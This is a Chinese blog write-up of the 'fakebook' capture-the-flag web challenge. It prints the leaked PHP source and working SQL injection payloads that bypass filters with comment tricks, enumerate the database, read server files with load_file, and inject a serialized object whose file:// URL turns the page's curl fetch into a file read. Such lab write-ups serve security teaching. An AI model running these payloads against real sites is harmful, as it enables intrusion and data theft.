Web(fakebook)

最新推荐文章于 2022-07-10 02:52:27 发布
最新推荐文章于 2022-07-10 02:52:27 发布
阅读量698 收藏
点赞数
分类专栏: CTF(攻防世界) 文章标签: php 正则表达式 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56010012/article/details/123310949
版权

题目描述
在这里插入图片描述
主要有两个按钮登录和注册,经过测试,注册按钮不能正常使用。
查看网页下的robots.txt文件
在这里插入图片描述关于robots.txt的描述
https://www.cnblogs.com/lzlzzzzzz/p/11700459.html

根据介绍,直接访问http://111.200.241.244:63286/user.php.bak
下载页面显示文件,查看该文件,用记事本打开,显示为PHP代码。

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

在isValidBlog ()函数中,正则表达式对blog中内容有特殊字符的限制。
关于正则表达式各个符号的详细介绍:https://www.cnblogs.com/-run/articles/2371078.html
“/^(((http(s?))😕/)?)([0-9a-zA-Z-]+.)+[a-zA-Z]{2,6}(:[0-9]+)?(/\S*)?$/i”
https://(可以写上,也可以不写)
(([0-9a-zA-Z-]+.))数字和字符再加上一个.
[a-zA-Z]{2,6} 英文字母a-z,A-Z,出现2-6次。
(:[0-9]+)?(/\S)? 出现0次或一次*
i(对大小写不敏感)

按照限制规则进行注册。
在这里插入图片描述
测试是否存在sql注入:单引号法,返回错误,存在注入。
在这里插入图片描述构造sql语句

order by 3 //回显正常
order by 4 //回显正常
order by 5 //回显不正常

通过结果猜测,页面最多存在4个column。

采用union select了解哪个位置可以回显。

union select 1,2,3,4

在这里插入图片描述
猜测页面对select union 字符进行了过滤,因此尝试转换大小写,发现结果并没有改变,通过网上的经验,构造一些含有特殊符号的sql语句。
之后尝试用union select看看哪个字段可以回显利用,为了不让我们构造的select语句与原来语句的结果混在一起,将原语句查询结果置为空(no=4)

 union++ select 1,2,3,4
 union/**/ select 1,2,3,4

payload:http://111.200.241.244:49463/view.php?no=4%20union++%20select%201,2,3,4#
在这里插入图片描述
因此可以得出回显位置为第2位。

查看数据库名

union select 1,database(),3,4#

数据库名为fakebook。
在这里插入图片描述
查看数据库的用户名

union select 1,user(),3,4#

root用户有着极高的权限,mysql中的load_file函数,允许访问系统文件,并将内容以字符串形式返回,不过需要的权限很高,且函数参数要求文件的绝对路径。
在这里插入图片描述

view.php?no=2 union/**/select 1,load_file("/var/www/html/flag.php"),3,4#

查看页面源代码,得到flag:flag{c1e552fdf77049fabf65168f22f7aeab}

否则,继续注入SQL语句,查找数据库中的表.,只发现users一个表。

view.php?no=2 union++ select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()#

查找user表中的字段。

view.php?no=2 union++ select 1,group_concat(column_name),3,4 from information_schema.columns where table_name="users"#

在这里插入图片描述查看具体字段所保存的数据。

no=2 union++ select 1,data,3,4 from users#

在这里插入图片描述

view.php?no=2 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:2:"ac";s:3:"age";i:23;s:4:"blog";s:7:"file:///var/www/html/flag.php";}' 
view.php?no=2%20union/**/select%201,2,3,%27O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}%27

第一条sql记录为我自己构造的
第二条是参照别人的,在这里修改这里的参数为上一步返回的data字段的值,反而没有src中的数据呈现在源代码中,当且仅当s:4:“blog”;s:29:“file:///var/www/html/flag.php”;时,src中有如下所示源代码。将其进行base转换可以得到flag值。
在这里插入图片描述

BRAVE_YAYA
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界WEB练习-Fakebook
墨鱼菜鸡
09-10 215
目录 题目场景 访问robots.txt 下载文件并查看 尝试进行注册 尝试SQL注入 猜测字段 查询数据库名 查询表名 查询段名 查看data数据 扫描目录 读取文件 查看源码 base64解码 提取flag 题目场景 访问robots.txt 下载文件并查看 <?php class Use...
攻防世界web题-fakebook
最新发布
m0_68074153的博客
07-23 303
fakebook
正则表达式基本语法
weixin_30663391的博客
04-18 242
1.正则表达式基本语法 两个特殊的符号'^'和'$'。他们的作用是分别指出一个字符串的开始和结束。例子如下: "^The":表示所有以"The"开始的字符串("There","The cat"等);"of despair$":表示所以以"of despair"结尾的字符串;"^abc$":表示开始和结尾都是"abc"的字符串——呵呵,只有"abc"自己了;"notice":表示任何包含"not...
攻防世界-web-fakebook
mlws1900的博客
07-10 174
打开网页,只有注册和登录选项,先看看robots.txt有什么直接下载一个user.php.bak文件,打开分析 设定了姓名,年龄,博客,博客地址利用了正则表达式其实也没有https://无所谓 选择join选项 join成功 点开admin发现?no=1,进行注入点测试显示有注入点 ,用order by 测试到4为止可以访问,存在四列 查看数据库,发现union select被过滤了,/**/可以绕过waf,获取到数据库 数据库名fakebook,information_schema,mysq
[原题复现][网鼎杯 2018] WEB Fakebook(SSRF、反序列化、SQL注入)
笑花大王
02-27 2640
简介 原题复现: 考察知识点:SSRF、反序列化、SQL注入 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过程 分析了整体结构 点击jion可以添加账号还有博客地址添加OK之后会有ifram把你的博客地址引用到当前页面 jion添加的信息点击进入发现了get注入点 注入进去没flag 不过在da...
fakebook:Facebook的克隆
05-23
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
mp12_social_network_fakebook_person
05-15
Mp12-社交网络(Fakebook)(人)[ManyToMany] 该应用程序将具有一个名为Person的实体,可以通过/ persons端点进行管理。 帖子将添加一个人,获取将显示所有这些人。 为了使一个人与另一个人成为朋友,我们将向终端...
fakebook-backend:学习个人项目探索MERN堆栈
04-10
Fakebook后端(express和mongodb)(这是一个学习/探索MERN堆栈的个人项目)入门: 确保已安装节点克隆仓库在fakebook文件夹中,创建一个带有dev.env文件的配置文件夹设置环境变量:PORT:value,MONGODB_URL = ...
Fakebook-Day2:在第2天之后,在完善蓝图功能之前
03-31
在“Fakebook-Day2:在第2天之后,在完善蓝图功能之前”这个项目中,我们主要探讨的是如何利用Python编程语言来构建一个类似Facebook的社交网络平台。在第二天的开发阶段,我们的重点在于完善项目的蓝图(Blueprint)...
webcrawler:一个简单的Java实现的网络爬虫,支持自动登录
06-24
第一个网络爬虫介绍Webcrawler 是一个简单的网络爬虫。 它实现了自动登录和内容获取的基本功能。 Webcrawler 将首先尝试使用提供的用户名和密码登录 。 如果登录失败,程序将被终止。 登录后,爬虫将开始获取它可以...
攻防世界(Web进阶区)——fakebook
垃圾管理员的垃圾站
04-09 6502
这个思路可能并不是靶场原本想要让用户做的,但也无妨吧,怎样不是做呢。象棋高手总结了几十年的经验,也可能会输给新入门的新手。新手经验不足,更不谈什么战术,无心的一步棋,可能会让老者思前顾后,露出弱点。 进入靶场: 除了一个login登陆按钮,还有一个join注册按钮。开始之前,一般习惯性的扫描下目录,看看有什么。如果大家经常刷题,可以自己写一个目录扫描工具,然后自己整理一套刷题的...
解网鼎杯一道web题(fakebook
洞若观火
08-23 1万+
扫描: nikto扫描: 发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak),输入到地址栏,得到文件user.php.bak。然后用御剑扫描,发现flag.php。 user.php.bak源码: &lt;?php class UserInfo {     public $name = "";     public $age = 0;     public $...
攻防世界-web-fakebook-从0到1的解题历程writeup
CTF小白的博客
04-13 4186
题目分析 拿到题目发现有注册登录界面,一般给了注册界面的很少会是sql注入登陆界面的,所以尝试先注册一个账号。 发现这边会加载注册时填写的blog地址,并将内容加载到一个iframe中。 这时发现网址为 http://159.138.137.79:55692/view.php?no=1 感觉就是有sql注入漏洞,虽然不知道考点在不在这,但是先注了再说。 尝试了一下就发现是数字型注入 sqlm...
攻防世界web进阶区Fakebook
gongjingege的博客
08-04 435
打开链接 是一个类似博客的界面,有登录和注册,考虑sql注入,先注册吧 注册后用户名可以点击 会发现url栏/view.php?no=1,估计在这里注入,试了一下,存在注入点 order by 4回显正常,5不行,所以4列 用union select注入,但是被过滤了 百度可以用/**/注释符绕过, no=-1 union/**/select 1,2,3,4# 从unserialize()可以看出,数据保存时序列化,输出反序列化,显示在博客界面。 还有文件的绝对路径/var/www/html/ 直
攻防世界web进阶区fakebook详解
hxhxhxhxx的博客
07-24 761
攻防世界web进阶区fakebook详解题目详解tips 题目 详解 注册框很可疑,我们抓包,sqlmap一把梭 python2 sqlmap.py -r wuzi.txt 发现了五个数据库,但是很可惜,都没有我们想要的flag,当我们查看fakebook的内容时,发现是用序列化来存储的 到这里我们思路就断了, 我们再来御剑一把梭 打开flag.php发现并没有什么作用,那么我们继续扫描 这时候,在robots.txt中发现了备份文件 <?php class UserInfo
fakebook_WEB
u014794949
11-24 133
进入环境后发现是一个含有注册等内容的网站 先扫一下 发现robots.txt和bak文件,robots.txt内容如下 指向user.php.bak 将文件下载之 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->
简单正则^(?![^a-zA-Z]+$)(?!\D+$)[0-9a-zA-Z]{6,35}$
热门推荐
七号空间
07-30 2万+
^(?![^a-zA-Z]+$)(?!\D+$)[0-9a-zA-Z]{6,35}$ ^  (?![^a-zA-Z]+$)  (?!\D+$)  [0-9a-zA-Z]  {6,35}  $ 1. ^ 匹配字符串开始(或行首) 2. (?![^a-zA-Z]+$)断言  此位置  后,字符串结尾之前,所有的字符不能全部由数字([^a-zA-Z]表示非英文字母,结合下文,这里匹配数字)组成. ...
php判断正则_PHP判断网址是否合法的正则表达式
weixin_30542979的博客
03-09 272
//一'/^https教程//?.+.[a-z]{2,4}$/';//'/^https//?.+.[a-z]{2,4}/.*$/';//'/^https?://.+.[a-z]{2,4}/.*$/';//'/^https?://.+.[a-z]{2,4}(/.*|)$/i'///^http(s)?://([a-za-z0-9.]?([0-9a-za-z][0-9a-za-z-]+.)+[a-za-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值